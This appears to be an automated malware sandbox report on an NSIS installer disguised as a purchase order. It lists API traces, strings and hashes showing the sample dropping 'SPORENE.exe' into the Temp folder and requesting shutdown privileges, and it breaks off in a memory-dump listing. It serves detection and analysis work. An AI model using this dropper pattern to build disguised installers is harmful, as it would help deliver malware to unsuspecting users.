lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
OleInitialize.OLE32(00000000), ref: 0040366A
SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Purchase Order PO20211027STK.exe" ,00000020,"C:\Users\user\Desktop\Purchase Order PO20211027STK.exe" ,00000000), ref: 004036D6
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
DeleteFileW.KERNELBASE(1033), ref: 0040386F
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965

Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Purchase Order PO20211027STK.exe" ,00000000,?), ref: 0040397C
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
CopyFileW.KERNEL32(00443800,0042AA28,00000001), ref: 00403A0E
CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
ExitProcess.KERNEL32(?), ref: 00403A59
OleUninitialize.OLE32(?), ref: 00403A5E
ExitProcess.KERNEL32 ref: 00403A78
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
ExitProcess.KERNEL32 ref: 00403B0C

Strings

Error launching installer, xrefs: 004038FF
NSIS Error, xrefs: 0040368E
UXTHEME, xrefs: 0040361B, 00403620, 00403626
1033, xrefs: 0040386A
C:\Users\user\AppData\Local\Temp, xrefs: 004037EE, 0040391D, 004039A4, 004039AE
C:\Users\user\AppData\Local\Temp\, xrefs: 004037FE, 00403803, 00403819, 00403825, 00403834, 00403841, 0040384D, 00403855, 00403953, 00403964, 0040396F, 0040397B, 0040398C, 0040399B, 00403A51
C:\Users\user\Desktop, xrefs: 00403975, 0040397A, 004039AD
Low, xrefs: 0040383C
TEMP, xrefs: 0040384E
SeShutdownPrivilege, xrefs: 00403AA1
~nsu, xrefs: 0040394E
"C:\Users\user\Desktop\Purchase Order PO20211027STK.exe" , xrefs: 004036A3, 004036A9, 004036BE, 00403895, 004038A1, 004038EF, 004038F9
.tmp, xrefs: 0040396A
\Temp, xrefs: 00403820
TMP, xrefs: 00403856
C:\Users\user\AppData\Local\Temp, xrefs: 00403928

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: "C:\Users\user\Desktop\Purchase Order PO20211027STK.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 2292928366-1236362802
Opcode ID: 8d24a3590c3fa0910ef95ef3363b7165c5538ed9a562f2e07edb708d24b89e61
Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
Opcode Fuzzy Hash: 8d24a3590c3fa0910ef95ef3363b7165c5538ed9a562f2e07edb708d24b89e61
Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00406873, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70, 41w,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,77313420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
FindClose.KERNEL32(00000000), ref: 0040688A

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD

Uniqueness

Uniqueness Score: -1.00%

Function 00403BEC, Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937

GetUserDefaultUILanguage.KERNELBASE(00000002,77313420,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403C06

Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491

lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,?,?,?,C:\Users\user\AppData\Local\Temp\SPORENE.exe,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,77313420), ref: 00403CED
lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\SPORENE.exe,?,?,?,C:\Users\user\AppData\Local\Temp\SPORENE.exe,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,?,00000000,?), ref: 00403D0B
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403D54
RegisterClassW.USER32(00433EA0), ref: 00403D91
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
RegisterClassW.USER32(00433EA0), ref: 00403E56
DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 00403C20
C:\Users\user\AppData\Local\Temp\SPORENE.exe, xrefs: 00403CB4, 00403CBD, 00403CCB, 00403D1A, 00403D20
1033, xrefs: 00403C0C, 00403C68
RichEd20, xrefs: 00403E1A
RichEd32, xrefs: 00403E28
_Nb, xrefs: 00403D70, 00403DD8
RichEdit, xrefs: 00403E47
C:\Users\user\AppData\Local\Temp, xrefs: 00403C7C, 00403C84, 00403D27, 00403D2D, 00403D3D
RichEdit20W, xrefs: 00403E38, 00403E3E
C:\Users\user\AppData\Local\Temp\, xrefs: 00403BF1
.DEFAULT\Control Panel\International, xrefs: 00403C58
.exe, xrefs: 00403CFA

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\SPORENE.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 606308-3179920610
Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040307D, Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181memoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040308E
GetModuleFileNameW.KERNEL32(00000000,00443800,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA

Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00443800,00443800,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C

Strings

Null, xrefs: 00403174
}8@, xrefs: 00403227, 00403242
soft, xrefs: 0040316B
Inst, xrefs: 00403162
Error launching installer, xrefs: 004030CD
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
C:\Users\user\AppData\Local\Temp\, xrefs: 00403084
C:\Users\user\Desktop, xrefs: 004030D8, 004030DD, 004030E3

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
API String ID: 2803837635-3216909688
Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D

Uniqueness

Uniqueness Score: -1.00%

Function 004032B4, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040331E
GetTickCount.KERNEL32 ref: 004033C5
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033EE
wsprintfW.USER32 ref: 00403401

Strings

}8@, xrefs: 004032B4
*B, xrefs: 004032DF
... %d%%, xrefs: 004033FB
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU, xrefs: 00403374, 0040337A, 0040347E, 00403484, 0040348F

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: CountTick$wsprintf
String ID: *B$... %d%%$UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU$}8@
API String ID: 551687249-1562186087
Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\SPORENE.exe,C:\Users\user\AppData\Local\Temp\SPORENE.exe,00000000,00000000,C:\Users\user\AppData\Local\Temp\SPORENE.exe,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5

Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A

Part of subcall function 0040559F: lstrlenW.KERNEL32(0042C248,00000000,?,773123A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,0042C248,00000000,?,773123A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
Part of subcall function 0040559F: lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
Part of subcall function 0040559F: SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Strings

C:\Users\user\AppData\Local\Temp\SPORENE.exe, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp, xrefs: 00401835, 00401851
C:\Users\user\AppData\Local\Temp, xrefs: 0040179E

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\SPORENE.exe
API String ID: 1941528284-4143458221
Opcode ID: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
Opcode Fuzzy Hash: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D

Uniqueness

Uniqueness Score: -1.00%

Function 0040689A, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
wsprintfW.USER32 ref: 004068EC
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900

Strings

UXTHEME, xrefs: 004068A3
\, xrefs: 004068C2
%s%S.dll, xrefs: 004068E6

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040605C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040607A
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095

Strings

nsa, xrefs: 00406069
C:\Users\user\AppData\Local\Temp\, xrefs: 00406061

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-944333549
Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70, 41w,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,77313420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405A6E: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401640

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
